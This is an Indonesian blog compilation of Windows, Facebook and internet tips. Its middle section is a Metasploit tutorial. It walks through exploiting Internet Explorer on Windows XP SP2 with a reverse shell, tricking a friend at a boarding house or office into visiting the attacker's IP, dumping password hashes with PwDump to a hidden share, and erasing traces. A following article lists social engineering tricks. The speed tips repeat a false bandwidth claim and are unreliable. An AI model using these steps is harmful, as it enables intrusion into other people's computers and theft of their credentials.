Mengirim lagu ke dinding facebook teman

Kalau komentar atau menulis sesuatu di dinding/ wall teman sudah biasa kita lakukan, sekarang saya ingin membagi tips mengirim lagu ke dinding Facebook teman kita dan bisa langsung didengarkan oleh teman kita, tergantung koneksi saja lagi, kalau koneksinya lambat ya buffer sedikit, tapi kalau kencang ya langsung bisa didengarkan. 
Berikut langkah-langkahnya :
  • Masuk ke acount Facebook teman anda yang ingin anda kirim lagu
  • Cari lagu atau MP3 yang ingin kita kirim ke teman, cari saja di www.beemp3.com, www.emp3world.com atau di http://singiku.com
  • anda tinggal copy paste url yang ada ekstensi .mp3 nya ke dinding Facebook teman anda
Seperti screen shot di bawah :
 Selamat Mencoba 
Sumber : tipsdariduniamaya.blogspot.com

Merubah url facebook dengan nama sendiri

Tadi baca-baca di http://blog.facebook.com/ dan dapat info baru tentang Username untuk Profil Facebook kita.sekarang Anda bisa mengganti dengan http://www.facebook.com/nama-Anda. Fitur ini mirip dengan yang ada di Friendster, namun perbedaannya di Facebook hanya diberi kesempatan sekali saja untuk memilih alamat dan tidak bisa diganti lagi.

Alamat Facebook bisa disetting di http://www.facebook.com/username mulai hari ini Sabtu, 13 Juni 2009 pukul 12:01 a.m. EDT atau jam 11.01 WIB (Kalau info di dalam beranda Facebook disebutkan jam 12.31).

Fitur ini cukup berguna karena memudahkan orang lain untuk menghapal alamat Facebook Anda. Selain itu alamat/nama Anda bisa terindek di Google dengan lebih baik

Sumber : tipsdariduniamaya.blogspot.com

Membuat status facebook dengan gambar unik

Hallo Para Facebooker, kali ini saya akan memberikan tips dalam membuat status di Facebook dengan karakter unik menggunakan sebuah aplikasi yang bernama Status Symbols. Dengan aplikasi ini nantinya kamu bakal bisa lebih pede dalam menulis status facebook kamu.

Penasaran ??? langsung aja kita tengok langkah-langkah untuk memakai aplikasinya :

1. Sebelumnya login Facebook terlebih dulu.

2. Masuk ke aplikasi Status Symbols klik disini

3. Pilih “Ke Aplikasi” lalu “Izinkan”

4. Klik Konfirmasi agar Aplikasi Symbol ini terhubung dengan Facebook kita

Cara penggunaannya :

1. Pilih kategori karakter yang mau kamu pakai, misal : Single Line – smileys, pictures dll.

2. Klik karakter yang mau kamu pakai, dia akan otomatis tercopy di kolom status

3. Kemudian klik SET STATUS.

Sumber : tipsdariduniamaya.blogspot.com

20 hack registry untuk tingkatkan kinerja PC

Kali ini saya akan mengulas tentang hack registry Komputer untuk Percepat Windows, Lebih Aman, dan Lebih Produktif
Fungsi klik-kanan merupakan cara yang sangat baik untuk mempelajari beberapa fungsi Windows yang tersembunyi. Ingin lebih? Cobalah Anda mulai menjelajahi aplikasi Control Panel dan temukan beberapa teknik yang bermanfaat. Dan masih ada lagi aplikasi Command Line pada folder Windows’ System32. Tapi, tidak ada satupun yang bisa menandingi Registry.

Registry dilengkapi dengan berbagai pengaturan yang bermanfaat untuk meningkatkan kinerja, memperbaiki lubang keamanan, dan bahkan mengubah basis fundamental Windows untuk bekerja lebih baik. Walaupun terlihat sangat canggih, Anda tetap perlu untuk berhati-hati dalam menggunakannya karena bukan hanya fitur yang membantu tetapi juga banyak perangkap.

Jika tidak berhati-hati, Anda justru malah menambahkan masalah dari pada memecahkannya. Untuk itu, di bawah ini terdapat 20 hack yang bisa Anda coba untuk membuat PC Anda menjadi lebih baik. Selamat mencoba!!

1. Tingkatkan Keamanan


Seseorang yang tidak diinginkan bisa dengan mudah mengambil data Anda dengan USB apabila ia berhasil mengakses PC Anda secara fisik. Jika Anda menggunakan Windows XP2 atau versi sesudahnya, ada sebuah cara sederhana untuk mencegahnya.

Masuk ke "HKLM\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies", buatlah sebuah nilai DWORD yang disebut "WriteProtect" dan atur pada nilai "1". Anda akan bisa membaca drive USB, tetapi tidak bisa memindahkan data ke dalamnya lagi.

2. Kendalikan UAC

Kendali Akun Pengguna milik Vista sangat sering memunculkan peringatan-peringatan yang akhirnya dimatikan oleh para pengguna. Tapi, kadang justru membuat mereka kelewatan fitur-fitur yang bermanfaat seperti mode perlindungan untuk IE. Anda bisa mengendalikannya dengan cara menonaktifkan peringatan bagi administrator, jadi Anda tidak perlu terganggu, namun UAC tetap bekerja pada latar belakang dan Anda masih bisa mendapatkan fitur-fiturnya.

Untuk melakukan ini, masuk ke "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin", dan atur nilainya menjadi "0". Untuk mengembalikannya ke kondisi normal, atur nilainya menjadi "2".

3. Ubah Pemilik

Instalasikan Windows pada PC dan Anda pasti akan diminta untuk memasukan nama, yang kemudian akan disimpan sebagai pemilik yang terdaftar (jalankan WinVer untuk melihat ini pada sistem Anda). Jika Anda membeli sebuah komputer bekas, mungkin Anda ingin mengganti nama pemiliknya dengan nama sendiri. Hmm..tak ada cara lain selain dengan Registry.
br>Masuk ke dalam "HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion" dan akan melihat dua kalimat "RegisteredOwner" dan "RegisteredOrganization". Klik ganda pada keduanya untuk mengganti.

4. Mengurutkan File dengan Benar


Mengurutkan nama file pada Explorer bisa menjadi suatu masalah. Pengaturan awal, ia akan menempatkan "File_v2.txt" sebelum "File_v15.txt", dan itu bukanlah urutan ASCII, tetapi terlihat lebih masuk akal. Tetapi, bagaimana jika "v" merujuk kepada nomor versi, dan seharusnya "File_v15.txt" di urutan terdahulu? Pada saat ini, sistem awal Explorer tidak bisa bekerja sama sekali.

Untuk mengembalikan pengurutan berdasarkan ASCII yang biasa, masuk ke "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", buatlah nilai DWORD yang disebut "NoStrCmpLogical" dan atur nilainya menjadi "1". Hapus kode tersebut jika ingin kembali ke kondisi awal Explorer yang standar.

5. Troubleshoot Startup

Jika Windows membutuhkan waktu yang terlalu lama untuk start up maupun shut down, kemungkinan ia sedang memiliki maslah. Untuk mengetahui apa yang sedang terjadi kembali masuk "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", buatlah sebuah nilai DWORD yang disebut "verbosestatus" dan atur nilainya menjadi "1". Restart PC Anda dan Windows akan memberitahu Anda apa yang sedang terjadi.

6. Mengatur Tipe-Tipe Folder

Explorer milik Vista akan secara cerdas memilih tipe folder Anda berdasarkan isinya. Tetapi, hal ini berarti folder download Anda akan berubah menjadi folder musik jika Anda mengunduh beberapa MP3. Untuk memperbaiki ini, masuk ke dalam "HCU\Software\Classes\LocalSettings\Software\Microsoft\Windows\Shelf", hapus subkey "Bags" dan buat yang baru pada lokasi yang sama.

Buatlah kunci bernama "AllFolders" di bawah Bags, dan kunci lain bernama "Shell" di bawahnya lagi. Kemudian klik padanya untuk membuka "HCU\Software\Classes\LocalSettings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell". Klik kanan pada bagian kanan panel, pilih "New | String Value" dan namakan ini "FolderType". Kemudian, klik ganda pada FolderType dan atur nilainya menjadi "NotSpecified". Anda masih bisa mengubah tipe folder, tapi Vista tidak akan mengubahnya secara otomatis. (Jika Anda membutuhkan bantuan, silakan klik di sini)

7. Enkripsi dengan Mudah

Beberapa versi Windows memungkinkan Anda untuk mengenkripsi file, walaupun prosesnya agak aneh. Anda harus mengklik-kanan pada file, pilih "properties", tekan tombol "Advanced, cek "Encrypt contents to secure data", dan tekan "OK" sebanyak 2x.

Untuk cara yang lebih sederhana, masuk ke "HKLM\SOFTWARE\Microsoft\Windows\Current\Version\Explorer\Advanced" buat DWORD yang bernama "EncryptionContextMenu" dan atur nilainya menjadi "1". Sekarang Anda cukup hanya mengklik-kanan pada file dan pilih "Encrypt".

8. Akses Folder dengan Cepat


Akses folder dengan cepat dengan memunculkannya pada Start Menu, Ketik "REGEDIT" pada "Run", masuk ke "HKCR\Folder\shellex\ContextMenuHandlers", klik-kanan "ContextMenuHandlers" dan klik "New | Key".

Ketik " dan tekan [Enter]. Sekarang, tahan [Shift], klik-kanan pada sebuah folder, dan pilih "Pin to Start Menu".

9. Percepat Waktu Peng-Kopian

Vista memberikan prioritas yang tinggi untuk soundcard Anda, jadi Anda butuh untuk mendapatkan audio yang bebas dari masalah tanpa peduli apa yang PC Anda sedang proses. Karena hal tersebut bisa memperlambat proses pengkopian pada jaringan.

Untuk memperbaikinya, masuk ke "HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Multimedia\SystemProfile". Coba atur "NetworkThrottlingIndex" menjadi lebih 10 – 50 atau 60 sudah cukup efektif, kemudian reboot dan uji kecepatan jaringan Anda. Untuk informasi lebih, klik di sini.

10. Perbaiki Listing Drive


Jika Explorer tidak lagi menampilkan DVD drive Anda, masuk ke "HKLM\System\CurrentControlSet\Control\Class\" dan hapus pengaturan "UpperFilters" atau "LowerFilters". Tips ini biasanya bekerja, tapi kadang bisa gagal jika memang aplikasi bersangkutan sudah bermasalah dari awalnya. Jika program berhenti bekerja, coba lihat apakah terdapat update, kemudian reinstall.

11. Akses Pengaturan Tampilan dengan Cepat


Klik-kanan saja pada desktop Windows Vista tidak cukup untuk membawa Anda langsung kepada menu pengaturan tampilan. Windows 7 sudah dipersiapkan untuk memperbaiki hal ini. Tapi, untuk sementara Anda bisa melakukannya dengan masuk ke "HKCR\Directory\Background\Shell", klik-kanan "Shell", pilih "New | Key" dan namakan "Display Settings".

Klik-ganda "(Default)" oada bagian kanan panel dan masukkan "Display Settings" pada kotak Value Data. Sekarang, klik-kanan "Display Settings" pada bagian kiri panel, pilih "New | Key" kembali, dan namakan fungsi ini sebagai "command".

Klik-ganda pada nilai Default fungsi-fungsi baru tersebut dan masukkan teks berikut ini: "rundll32 shell32.dll,Control_RunDLL DESK.CPL,@0,3". Klik "OK" dan klik-kanan pada desktop untuk melihat opsi pengaturan tampilan yang baru.

12. Multiple Live Messenger Log-In


Biasanya, Windows Live Messenger (WLM) hanya memungkinkan Anda untuk masuk ke dalam satu akun saja pada satu waktu tertentu. Untuk membuatnya menjadi lebih dari satu, masuk ke "HKLM\Software\Microsoft\WindowsLive\Messenger", buat nilai DWORD yang bernama "Multiple Instances" dan atur nilainya menjadi "1". Untuk mengembalikan ke kondisi semula, cukup hapus nilai tersebut.

13. Bersihkan Menu-Menu


Anda telah meng-unsinstall sebuah aplikasi, tapi ia malah meninggalkan Anda sebuah cinderamata berupa ikon-ikon yang tidak berguna. Untuk memperbaiki ini, masuk ke "HKCR\*" dan "HKCR\Directory". Perlebar panelnya, kemudian pilih "shellex\ContextMenuHandlers" dan lihat berbagai tombol di bawahnya yang berhubungan dengan perintah yang tidak Anda inginkan.

Pada PC, fungsi "HKCR\*\shellex\ContextMenuHandlers\7-Zip" berhubungangan dengan menu konteks 7-Zip, sebagai contohnya, untuk menghapusnya, klik "Delete" pada bagian kiri panel. Tapi hati-hati, sebaiknya Anda hanya menghapus jika sudah 100% yakin pada menu yang tepat.

14. Percepat Back-Up


Fitur NTCBACKUP milik Windows XP meningkatkan kinerjanya dengan mempertahankan daftar file sistem yang ia tahu kalau Anda tidak akan mungkin ingin membuat back-upnya. Tambahkan file dan folder yang Anda inginkan sendiri dan dapatkan hasil yang lebih baik lagi.

Lihat daftarnya pada "HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FileNotToBackup".

15. Ubah Folder Instalasi Default

Kebanyakan instalasi default adalah folder Program Files, tapi jika Anda ingin menggantinya, masuk ke "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion", ubah "ProgramFilesDir" menjadi folder pilihan Anda dan reboot

16. Mengubah Nama Drive

Menambahkan sebuah pembaca kartu memori dan Explorer akan sering kali menghentikan folder komputer yang memiliki nama drive yang mirip. ("Removable Drive D: ", "Removable Drive E: ", dan seterusnya), membuatnya menjadi susah untuk membedakannya.

Anda bisa mengatasinya dengan "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer". Buatlah tombol dengan huruf dari drive (sebagai contoh "G"), dan di dalamnya buatlah lagi tombol baru yang bernama "DefaultLabel". Klik-ganda pada tempat memasukkan nilainya, berilah nama "CompactFlash" (atau apapun sesuka Anda), dan klik "OK". Restart Explorer atau tekan [F5] dan lihat perubahannya. Drive G: akan terbaca sebagai "CompactFlash (G:)".

17. Wipe the Page File


Windows menyimpan memori halaman-halaman pada file paging selama Anda bekerja. Semuanya terdengar baik, sampai seseorang berhasil mengakses sistem Anda, menemukan file-file tersebut, dan menambahkan atau justru mengurangi sesuatu yang tidak Anda inginkan.

Untuk mengatasinya, masuk ke "HKLM\SYSTEM\CurrentControlSet\Control\SessionManager\MemoryManagement", atur nilai "ClearPageFileAtShutdown" menjadi 1 dan reboot. Windows akan menghapus semua file halaman ketika ia dimatikan. Memang memperpanjang durasi dan proses, tapi meningkatkan keamanan.

18. Crash on Cue

Layar biru crash biasanya membawa kabar buruk, tetapi kadang Anda mungkin ingin memunculkannya untuk menguji laporan eror Windows misalnya. Ternyata trik Registry bisa membantu Anda bahkan untuk hal yang satu ini.

Masuk ke "HKLM\SYSTEM\CurrentControlSet\Services\i8042prt\Parameters", buat DWORD bernama "CrashOnCtrlScroll" dan atur nilainya menjadi 1. Reboot komputer Anda, dan untuk meng-crash cukup tahan [Ctrl] kanan dan tekan [Scroll Lock] dua kali. Setelah selesai, pastikan Anda segera menghapus perintah tersebut.

19. Save CPU Time


Sebuah PC standar biasanya memiliki beberapa program yang ingin menggunakan kapasitas prosesor pada saat yang bersamaan, dan Windows akan mengalokasi setiap periode dari CPU time sebuah "quantum" sebuah berpindah ke program yang berikutnya. Secara default, biasanya ini sangat pendek, sehingga PC akan menjadi responsif, tapi terkadang hal ini berarti Windows akan membuat waktu untuk berpindah di antara proses-proses tersebut.

Solusinya? Anda bisa mencoba apa yang Windows Server lakukan. Atur sistem untuk menggunakan quantem yang lebih lama. Atur "HKLM\SYSTEM\CurrentControlSet\Control\PriorityControl\Win32PrioritySepartion" menjadi 16 (hex).

Quantum yang lebih lama berarti pergantian yang lebih sedikit di antara program jadi lebih sedikit waktu yang terbuang. Anda bisa memperhatikan kalau lag pada game atau pemutaran video akan menjadi lebih halus. Tapi, jika Anda menemukan masalah lainnya, cukup kembalikan nilai Win32PrioritySeparation menjadi nilai orisinilnya yaitu 26.

20. Non-aktifkan AutoRun


Fitur AutoRun milik Windows merupakan salah satu risiko keamanan yang berpotensi karena ia menjalankan kode secara otomatis ketika Anda menyambungkan alat yang bersifat removable ke dalam PC. Jika memang, hal tersebut bisa diatur secara manual saja, maka akan lebih aman untuk mematikan fitur tersebut.

Pada beberapa sistem, hal tersebut hanya bisa dilakukan melalui Registry. Masuklah ke "HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\IniFileMapping" dan buat tombol yang bernama "Autorun.inf".

Kemudian, klik-ganda pada nilai defaultnya dan masukkan "@SYS:DoesNotExist". Kemudian hapus "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2". Sekarang, Windows tidak lagi menjalankan kode apapun pada CD, DVD, atau portable drive secara otomatis. Anda harus menjalankannya secara manual.


Sumber : www.blogcatalog.com

Cara mempercepat koneksi internet (part 1)

Browsing Internet dengan kecepatan yang tinggi pasti sangat menyenangkan, berbagai cara dilakukan untuk mempercepat koneksi internet baik menggunakan software agar koneksi internet menjadi lebih cepat maupun menggunakan settingan tertentu yang diklaim bisa mempercepat koneksi internet.

Berikut ini adalah beberapa tips yang dapat digunakan untuk mempercepat koneksi internet :

TUTORIAL TIPS 1

I. Menggubah setting bandwith Pada windows
Pada dasarnya OS windows sudah membatasi bandwidth untuk koneksi internet sebanyak 20% dari total bandwidth yang seharusnya bisa maksimal,Jika anda ingin menambah bandwidth internet supaya koneksinya terasa lebih cepat dan kencang bisa dengan cara mengurangi atau mengosongkan batasan bandwidth tersebut supaya pada Windows kita bisa maksimal dalam menggunakan bandwidth yang sudah ada.

I. Ikuti langkah- langkah berikut ini :

1. Klik Start
2. Klik Run
3. Ketik gpedit.msc
4. Kemudian klik Ok
5. Setelah masuk klik Administrative Templates
6. Kemudian Klik Network
7. Setelah terbuka klik QoS Packet scheduler
8. Kemudian klik Limit Reservable Bandwidth
9. Dan setelah terbuka ubah setting menjadi Enable
10. Kemudian ubah Bandwidth Limitnya menjadi 0
11. Klik Apply,ok
12. Kemudian keluar dan Restart komputer

II. Gunakan DNS dari OpenDNS untuk koneksi internet yang lebih cepat dan lebih aman.

1. Klik Start
2. Klik Control Panel
3. Pilih Network & Internet Connection
4. Klik Network Connection
5. Klik Kanan Local Area Connection pilih Properties
6. Pilih Internet Protocol (TCP/IP) kemudian Klik Properties
7. Klik Use Following DNS Server
8. Isi Preferred DNS Server dengan angka : 208.67.222.222
9. Isi Alternate DNS Server dengan angka : 208.67.220.220
10. Kemudian Klik OK

III. Jika menggunakan Browser Firefox gunakan add on Fasterfox

Fasterfox adalah sebuah add on yang berfungsi untuk mempercepat koneksi dengan melakukan optimasi pada network dan cache browser. Fungsi dari cache adalah untuk menyimpan data sementara dari website yang kita kunjungi, sehingga ketika kita membuka kembali website tersebut proses loading-nya akan lebih cepat karena datanya telah disimpan di cache.

Beberapa optimasi yang dapat dilakukan oleh fasterfox adalah: HTTP pipelining, Memory caching,Disk caching,DNS caching,FastBack caching.
IV. Bagi pengguna Firefox, silahkan pasang Adblock
Fungsinya adalah untuk mem-filter iklan-iklan yang tidak perlu pada saat kita browsing, sehingga proses loading akan menjadi lebih cepat dan maksimal.

Sekian, semoga bermanfaat ##

Belajar hack yukk! (3) – hack windows XP SP2

*Fyuhh… akhirnya sempet juga nyelesain tulisan ini. Yosh.. here is the prof of concept!.
Disclaimer: This document was written in the interest of education. The author cannot be held responsible for how the topics discussed in this document are applied.
Setelah mengetahui sedikit dan konsep dasar ‘standar’ mengenai hack yang dibahas dibagian pertama dan mengetahui sedikit materi mengenai exploit pada bagian kedua, sekarang langsung aja kita praktek. Disini saya sengaja menggunakan VMWare untuk melakukan simulasi, karena tidak semua orang dapat mempraktekannya dalam suatu jaringan. Dengan menggunakan VMWare, kita dapat mensimulasikan jaringan sederhana yang seolah-olah ada suatu jaringan yang terdiri dari komputer kita sendiri dan komputer lainnya. Bagi yang belum bisa menggunakan VMWare, coba cari diinternet! Sistem Operasi yang saya gunakan adalah Windows XP SP2.
Tools yang saya gunakan adalah Metasploit Framework untuk melakukan exploit serta PwDump6 untuk mengambil hash file dari komputer target. Apa itu Metasploit Framework ?
The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, and vulnerability research.

Untuk penggunaan lebih lanjut mengenai Metasploit, anda dapat membaca dokomentasi yang juga diikutsertakan dalam instalasi. Untuk melakukan instalasi metasploit versi 2.7, dibutuhkan user administrator. Sebelumnya saya mencoba menginstall dengan ‘limited user’ tapi setelah diinstall tidak bisa dijalankan. Sebenarnya instalasi metasploit ini hanya mengekstrak file saja. Jadi anda dapat menginstallnya tanpa harus mendapatkan user admin serta meletakkannya dimanapun tanpa harus menginstal di Folder Program Files. Namun setelah sedikit dioprek, ternyata tidak harus admin yang bisa menjalankan. Agak ribet dan males juga sih nulis disini, soalnya ketika mencoba versi terbaru, yaitu versi 3 Beta 3, kita dapat menjalankannya tanpa harus menginstall dengan user admin. Gitu aja ko repot! Lagipula versi 3 (skarang msh beta) lebih keren dan fiturnya lebih banyak. Tapi sayangnya untuk msfweb (versi webnya) belum bisa dijalankan sepenuhnya.
Ok.. sekarang saya asumsikan anda telah membaca userguide metasploit (ah.. paling asumsi saya salah ;p). Biar lebih keliatan keren dan memahami detailnya, saya menjelaskan metasplooit yang menggunakan console (mfsconsole) saja. Metasploit menggunakan cygwin untuk menjalankannya, karena metasploit dibuat menggunakan Perl. Sekarang mari kita praktekkan!!
Pertama2 jalankan ‘mfsconsole’!
main1.JPG
Untuk mempelajari command apa saja yang ada di MSFConsole gunakan perintah ‘help’.
Karena komputer yang ingin dijadikan target adalah Windows XP SP2, maka digunakan exploit yang berpengaruh terhadap XP SP2 yaitu dengan memanfaatkan kelemahan pada Internet Explorer VML Fill Method Code Execution.
This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.
Untuk melihat info dari exploit ini gunakan perintah :
msf > info ie_vml_rectfill
Exploit ie_vml_rectfill memanfaatkan kelemahan pada Internet Explorer. Oleh karena itu, exploit ini akan berpengaruh jika komputer target menjalankan IE dan mengarahkan url-nya ke komputer penyerang. Untuk itu, kita harus menggunakan sedikit ‘social engineering’, seperti jika di kost/lab/kantor kita bilang ke teman kita bahwa kita sedang mencoba membuat aplikasi web terbaru, lalu minta tolong dilihat menggunakan IE ke alamat IP (atau nama komputer) kita. Misalkan http://192.168.186.1. Biasanya setelah exploit ini dijalankan dan komputer target telah terhubung, maka IE akan crash. Biarkan beberapa saat untuk membiarkan exploit ‘bekerja’. Setelah beberapa saat bilang aja “wah.. ada error nih. Ok deh.. saya coba betulin dulu… makasih ya”. Baru tutup IE-nya pake Task Manager (walaupun pake TM, IE msh sulit di-kill, jangan lupa untuk me-’end process’-kan ‘dumpred.exe’ juga, tapi setelah exploit bekerja :-D ).

Untuk menggunakan exploit gunakan perintah2 berikut dalam console :
msf > use_ie_vml_rectfill
msf > set PAYLOAD win32_reverse
msf > set RHOST ip_target
msf > set LHOST ip_penyerang
msf > exploit
Hasilnya akan tampak seperti gambar berikut :
exploit1.JPG
Dalam contoh diatas, IP komputer target (RHOST) adalah 192.168.186.128, sedangkan komputer penyerang (LHOST) adalah 192.168.186.1. Lalu ‘payload’ yang digunakan adalah ‘win32_reverse’ dan HTTP PORT nya adalah 80 (default http port). Setalah menjalankan perintah ‘exploit’, baru kita minta komputer target untuk menjalankan IE dan mengarahkan url-nya ke komputer kita. Proses ini akan memakan waktu agak lama, bahkan terkadang tidak berhasil. Jadi coba-coba aja terus :-D
Jika anda berhasil, maka anda akan mendapatkan ‘cmd.exe’ dari komputer target.

Crack da Password!
Nah, setelah kita ‘menguasai’ komputer target, skalian aja kita lihat password-nya. Caranya mirip dengan artikel saya sebelumnya tentang Hack Win XP SP2 Password, tapi karena ini remote maka kita harus ‘menyediakan’ program yg dibutuhkan yaitu PwDump. Agar cara ini berhasil, saya asumsikan pada komputer target user yang sedang login mempunyai akses admin. Klo user yang digunakan komputer target yang dimanfaatkan IE-nya hanya user ‘biasa’, pwdump tidak akan berhasil!
Pertama kita share dulu PwDump dari komputer kita dengan full access agar kita bisa mengupload hasil dump password komputer target, tapi dengan akhiran ‘$’ biar tidak terlihat dikomputer umum. Misalkan nama folder yang di share PwDump$. Lalu dari console yang berhasil dihack, ambil PwDump dengan Map Network Drive dari komputer kita dengan ‘net use’. Contoh perintah yang digunakan :
pwdump.JPG
Setelah itu copy Pwdump ke komputer target dalam folder sementara, ‘temp’. Setelah Pwdump berhasil di-copy ke komputer target, jalankan Pwdump dengan perintah
C:\temp\Pwdump –o pass.txt 127.0.0.1
Klo berhasil akan tampak pada gambar berikut.
dump1.JPG

 Lalu copy file pass.txt ke komputer kita
C:\temp\copy pass.txt z:
Dan terakhir, jangan tinggalkan jejak bahwa kita sudah mampir kesitu.
clean.JPG
Nah, udah dapet hash file nya kan. Tinggal di crack aja deh…. (baca artikel sebelumnya buat nge-crack password).
Sebenarnya masih banyak yang dapat dioprek dari metasploit. Dalam metasploit terdapat banyak exploit, payload, meterpreter, dsb yang sangat ‘menyenangkan’ untuk dioprek. Untuk mempelajari metasploit, disitusnya terdapat dokumentasi yang lumayan baik.
Happy Hacking…..

Beberapa saran agar windows kita tetap aman terhadap exploit diatas.
1. Jangan gunakan Internet Explorer. Gunakan Mozilla Firefox atau Opera!.
2. Patch Windows anda.
3. Gunakan antivirus dengan update terbaru
4. Hati2 terhadap teman anda sendiri.. waspadalah!! ;p

Sumber : www.metasploit.com

Metode untuk melakukan social engineering

Metode yang Dipakai
Metode untuk melakukan social engineering bisa dibagi ke dalam dua cara yaitu secara fisik dan secara psikologi. Untuk metode social engineering secara fisik bisa dilakukan dengan mendatangi tempat kerja, melakukan hubungan telepon, memeriksa dari hasil sampah (mengambil sampah orang lain bukan
merupakan pelanggaran hukum) atau dengan koneksi Internet. Bila attacker memilih mendatangi tempat kerja, dia cukup memasuki perusahaan sasaran dengan berpura-pura menjadi konsultan, pegawai operasional, atau siapa pun yang berhak memasuki perusahaan tersebut. Selanjutnya dia bisa memasuki ruang-ruang seperti pada cerita di atas, atau cukup duduk dan menunggu sampai ada pegawai yang secara ceroboh menuliskan atau membicarakan password atau informasi penting lainnya di depannya.

1. Social Engineering dengan melakukan hubungan telepon
Yang paling sering terjadi adalah metode ini . Dengan melakukan sedikit trik seorang attacker yang berpengalaman akan mampu membuat pegawai yang menerima telepon mengucapkan username maupun passwordnya atau informasi lainnya yang dibutuhkan attacker. Biasanya pegawai yang bertugas di lini depan seperti bagian informasi atau customer service yang akan dihubungi karena selain mereka memang dilatih untuk selalu bersikap ramah dan memberikan informasi kepada penelpon. Mereka biasanya hanya mendapatkan sedikit pelatihan mengenai masalah teknik sehingga kurang mengerti bagaimana mengamankan informasi yang penting bagi keamanan perusahaan. Mereka akan selalu berusaha memberikan informasi yang diminta penelpon secepat mungkin agar bisa segera menerima penelpon berikutnya tanpa sempat memikirkan apa yang dapat dilakukan oleh penelpon dengan informasi yang telah diberikannya. Dari mereka biasanya attacker mendapatkan informasi yang diinginkannya dengan mudah. Bisa juga dengan langsung menelpon ke admin. Misalnya setelah seorang attacker mempelajari suatu perusahaan yang menjadi sasarannya, dia akan menelpon ke admin dengan mengaku sebagai pegawai yang ada di perusahaan tersebut. Karena dia telah mempelajari, bisa saja dia mengaku sebagai pegawai A yang menempati ruang kantor sebelah B di urutan meja ke X. Setelah merasa admin bisa diperdaya, dia akan mengatakan ,”Buku catatan kecil saya yang berisikan catatan password tertinggal di meja sehingga saya tidak bisa menyelesaikan pekerjaan saya dari rumah. Bisakah anda mengambilkan untuk saya ?” Seorang admin tentunya terlalu sibuk untuk dapat mengambilkan buku catatan seseorang, dan karena dia telah merasa yakin penelpon adalah pekerja di situ, dia cukup membuka database dan memberitahukan password ke penelpon.

2. Dumpster Diving
Dumpster diving atau juga disebut trashing adalah metode populer lainnya, yaitu attacker mengumpulkan informasi dengan memeriksa sampah perusahaan sasaran. Ada banyak yang bisa didapatkan seorang hacker dari sampah perusahaan selama sampah itu tidak berupa makanan busuk. Buku telepon akan memberikan petunjuk nama dan nomer orang-orang yang bisa dihubungi, kalender menunjukkan pekerja mana saja yang akan bertugas keluar kota pada saat tertentu, catatan kerja harian bisa dipelajari untuk dicari kelemahannya, dan sebagainya.

3. Koneksi Internet
Ketika seorang pekerja sedang melakukan koneksi Internet, tiba-tiba sebuah pop-up window keluar dan mengatakan bahwa koneksinya terputus dan untuk itu dia harus kembali menuliskan username dan passwordnya. Tanpa curiga pekerja tadi akan melakukannya dan semudah itu attacker mendapatkan informasi.
Sebuah kesalahan yang sering dilakukan adalah orang cenderung untuk menggunakan password yang sama untuk berbagai layanan yang dimilikinya, misalnya untuk e-mail, messenger, ATM, dan sebagainya. Akibatnya begitu seorang attacker berhasil mendapatkan password tadi, dia akan bisa memasuki semua layanan yang tersedia untuk orang tadi.
Pengiriman e-mail juga sering dilakukan karena e-mail bisa membawa berbagai virus dan trojan. Misalnya dengan memberitahukan bahwa attachment file yang disertakan di e-mail merupakan patch sistem operasi yang harus segera dijalankan. User mungkin merasa ini bukan hal yang perlu dilakukan verifikasi terlebih dahulu karena merasa e-mail itu berasal dari vendor sistem operasi yang digunakan. Selanjutnya dengan satu langkah klik user telah berhasil menanamkan trojan (meskipun tidak sengaja) yang siap membuka jalan untuk serangan.
Pada intinya dengan bekal pengetahuan dan pemahaman tentang keamanan jaringan yang kurang, manusia sebagai user bisa melakukan berbagai tindakan yang membahayakan keamanan jaringan dan secara tidak langsung membantu attacker untuk menyusup ke dalamnya.

4. Pendekatan Psikologi
Selain cara-cara di atas, seorang attacker bisa menggunakan langkah-langkah psikologis untuk mendapatkan informasi, yaitu dengan mengadakan sebuah ikatan emosional dalam tujuan mendapatkan kepercayaan. Atau seperti yang pernah Kevin Mitnick ucapkan, "That is the whole idea: to create a sense of trust and then exploiting it." Misalnya dengan menjalin suatu hubungan dengan orang dalam, sebagai contoh dengan memacari sekretaris dari pemimpin perusahaan. Dia lalu akan memberikan kesan sebagai orang yang bisa dipercaya dan lambat tapi pasti tidak hanya si sekretaris, tapi setiap rahasia perusahaan pun akan berada di tangannya. Attacker bisa melakukan berbagai hal untuk sekedar menarik simpati atau menjalin hubungan
dengan orang-orang yang dianggap bisa menjadi jalan untuk mencapai tujuannya dan memang pada dasarnya seni dari social engineering adalah bagaimana seorang attacker bisa mendapatkan kepercayaan dari pihak korban.

Sumber : www.konek.co.cc

Tips dan trik memilih password yang aman


Selama masih menggunakan kode-kode dalam keyboard, sepertinya tidak ada password yang tidak dapat ditebak. Memilih atau merancang password memerlukan strategi khusus dan harus mau mengubah-ubah dalam kurun tertentu. Tidak memakai password sama sekali (blank password) sangat tidak dianjurkan, walaupun itu menjanjikan kemudahan.

Ingatlah! Kejahatan bukan hanya karena niat, bisa jadi karena tidak sengaja lewat, melihat, atau mendengar.

Berikut ini adalah daftar hal-hal yang sebaiknya tidak digunakan sebagai password.

Nama Anda, istri/suami, anak, ataupun famili, nama komputer, alamat rumah, nomor telepon, atau plat nomor kendaran.
Tanggal lahir pribadi atau keluarga.
Kata-kata populer yang terdapat dalam kamus (bahasa Indonesia/Inggris).
Password dengan karakter sama yang diulang-ulang atau berurutan dalam penyebutan atau secara tata letak dalam keyboard. (contoh: 12345, asdfgh, qwerty)

